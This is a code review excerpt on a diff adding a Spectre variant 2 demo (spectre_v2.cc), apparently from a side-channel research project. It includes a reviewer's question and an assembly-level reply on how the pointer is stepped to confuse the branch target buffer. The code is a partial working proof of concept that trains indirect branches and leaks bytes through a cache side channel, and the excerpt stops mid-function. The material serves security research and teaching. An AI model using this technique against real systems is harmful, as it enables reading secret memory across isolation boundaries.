demos/spectre_v2.cc

```diff
@@ -0,0 +1,296 @@
+// unsafe address in LeakByte.
+template<unsigned int N> struct DummyCalls {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (**dummy_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL **dummy_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *unsafe_address) {
+    CLFlush(dummy_reader);
+    (*dummy_reader)(unsafe_address);
+    DummyCalls<N - 1>::generate(dummy_reader, unsafe_address);
+  }
+};
+
+template<> struct DummyCalls<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (**dummy_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL **dummy_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *unsafe_address) {
+    // Empty.
+  }
+};
+
+// We fastcall the readers in the 32-bit mode so that there is only one
+// instruction. Otherwise there would be two (fetch the pointer from the stack
+// and fetch from the pointer).
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+FirstActualRead(const void *addr) {
+  // We read the value 100 times to have enough places to jump to.
+  Fetches<100>::generate(addr);
+}
+
+// DummyRead is between the two real reads, so that misjump chances are the
+// highest possible.
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+DummyRead(const void *addr) {
+  // Does nothing - only NOPs.
+  Nops<100>::generate();
+}
+
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+SecondActualRead(const void *addr) {
+  // Read it one more time to avoid compiler deduplication with jump to the
+  // FirstActualRead.
+  Fetches<101>::generate(addr);
+}
+
+static char LeakByte(const char *data, size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &isolated_oracle = sidechannel.GetOracle();
+
+  // Pointer to pointer to DummyRead so that we can easily flush it from
+  // the cache and start speculative execution.
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+  std::unique_ptr<void(*)(const void *)> dummy_reader =
+      std::unique_ptr<void(*)(const void *)>(new (void (*)(const void *)));
+#elif SAFESIDE_IA32
+  std::unique_ptr<void(SAFESIDE_FASTCALL *)(const void *)> dummy_reader =
+      std::unique_ptr<void(SAFESIDE_FASTCALL *)(const void *)>(
+          new (void (SAFESIDE_FASTCALL *)(const void *)));
+#else
+#  error Unsupported architecture.
+#endif
+
+  for (int run = 0;; ++run) {
+    sidechannel.FlushOracle();
+
+    // We pick a different offset every time so that it's guaranteed that the
+    // value of the in-bounds access is usually different from the secret value
+    // we want to leak via out-of-bounds speculative access.
+    size_t safe_offset = run % strlen(data);
+
+    // We are going to shift these pointers instruction-by-instruction (mov
```

Comment:
What do you mean by "shift" these pointers?

Reply:
The FirstActualRead function looks like this:

_Z15FirstActualReadPKv:
.LFB2466:
	.cfi_startproc
	movzbl	(%rdi), %eax
	movzbl	(%rdi), %eax
	movzbl	(%rdi), %eax
	movzbl	(%rdi), %eax
95 more movzbl calls
	movzbl	(%rdi), %eax
	ret

So the pointer is originally pointed to the label, but in the next iteration it points to the second movzbl instruction, in the third iteration it points to the third movzbl instruction, etc. The functionality is still the same, but the number of target destination addresses increases (to 100) which is effective for confusing the BTB.